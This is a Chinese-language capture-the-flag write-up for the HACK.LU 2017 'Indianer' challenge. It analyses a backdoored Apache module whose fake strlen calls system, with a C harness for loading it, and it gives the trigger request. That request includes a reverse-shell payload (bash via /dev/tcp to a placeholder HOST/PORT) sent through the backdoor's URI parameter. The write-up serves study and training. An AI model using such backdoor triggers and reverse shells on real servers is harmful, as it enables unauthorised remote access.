[HACK.LU CTF 2017](Web && Reverse)Indianer


https://indianer.flatearth.fluxfingers.net/


题目给了一个网站 , 访问发现是 apache2 的首页
题目还提供了一个二进制程序
下载下来发现是 apache2 的一个扩展链接库
猜测很有可能是 apache 的扩展后门


发现有一个很奇怪的 strlen 函数
定位到 strlen 函数


image.png

这里调用了 system 函数 , 参数 sa 似乎可控

image.png

写了一段小代码去调用这个函数

#include <stdio.h>
#include <dlfcn.h>

int (*backdoor_strlen)(char *);

int main(){
    // char request_headers[] = "GET index.html HTTP/1.1\r\n\r\n";
    char request_headers[] = "GET";
    void *handle = dlopen("./backdoor.so", RTLD_LAZY);
    backdoor_strlen = (int (*)(char *))dlsym(handle, "strlen");
    backdoor_strlen(request_headers);
}
main:main.c
    gcc -g -o main main.c -ldl
clean:
    rm -rf ./main

动态调试一波 :
为了快速拿到 needle 可以直接断在 memmem 这里 :
因为这里刚好是在参数中寻找 needle 这个字符串

image.png
image.png
image.png

这样我们只需要顺着这个后门的逻辑以这个字符串为键 , 命令为值构造 payload 即可

GET ndex.html?dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp=[COMMAND] HTTP/1.1

在后门的逻辑中 , 会将命令中所有的下划线都替换为空格
因为 apache 中空格会影响对 HTTP 请求中 URI 的解析
而后门的命令就是在 URI 中的 , 所以需要替换一次

所以最终可以直接利用后门反弹 shell

GET ndex.html?dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp=bash_-c_'bash_-i_&>/dev/tcp/HOST/PORT_0>&1 HTTP/1.1

注意这里有一个坑点就是 , 不能直接使用浏览器来利用这个后门 , 因为你的URI中的特殊字符会被浏览器自动转义
所以可以使用 netcat 或者 burpsuite 等
也可以直接用 socket

比赛的时候死活觉得这个后门有逻辑问题 , 根本不能执行到 system 函数
因为当时是这样理解的 :


image.png
image.png
image.png

因为比赛的时候 , 我不知道怎么去直接调试 apache , 所以就直接写代码加载这个 so 库
然后传入的参数是整个 HTTP 请求 , 所以无论如何都无法进入这个分支

比赛结束后 , 又遇到上海大学生信息安全大赛 , 其中刚好出这道原题
然后直接利用 Hack.Lu 的 Payload 整上去侥幸拿了一血
直到上海的比赛结束一天晚上和家伟讨论的时候才猛然醒悟
原来 apache 调用这个函数的时候不是将整个请求传进去的
应该是会先调用这个函数得到请求方法的长度 , 也就是 strlen('GET')
这个时候 , trigger 会自增 , 变成 1
然后因为 memmem 函数的第二个参数是 strlen('GET') , 所以肯定不可能找到 needle
但是 , 接下来 apache 会把请求的 URI 传入 , 这个时候 trigger 已经是 1 了
所以就可以直接执行命令了
最开始没有想通的原因就是没有想到 apache 不是将整个请求头传给 strlen 这个函数的
而是分成小块传递的


后记 :
暂时还不是很懂为什么这个后门可以执行 , 为什么函数叫 strlen
自己意淫的感觉可能因为这个后门的 strlen 函数将 apache 的 strlen 函数给替换掉了 ?
这样 apache 在收到一个请求之后 , 他本身的逻辑肯定会调用 strlen 函数来求 URI 的长度
这样就可以触发这个后门吗 ?

暂时还不知道这种后门应该怎么直接调试 apache
apache 应该是一个多进程的 web server 吧
可能需要用调试器 attach 上去
最近比较忙 , 先占个坑 , 等以后搞清楚怎么调试这种多进程的程序再补上

//TODO 还得查查怎么调试多线程的程序 , 感觉难度可能有点大
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 162,825评论 4 377
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 68,887评论 2 308
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 112,425评论 0 255
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,801评论 0 224
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 53,252评论 3 299
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 41,089评论 1 226
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 32,216评论 2 322
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 31,005评论 0 215
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,747评论 1 250
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,883评论 2 255
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,354评论 1 265
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,694评论 3 265
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,406评论 3 246
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,222评论 0 9
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,996评论 0 201
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 36,242评论 2 287
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 36,017评论 2 281

推荐阅读更多精彩内容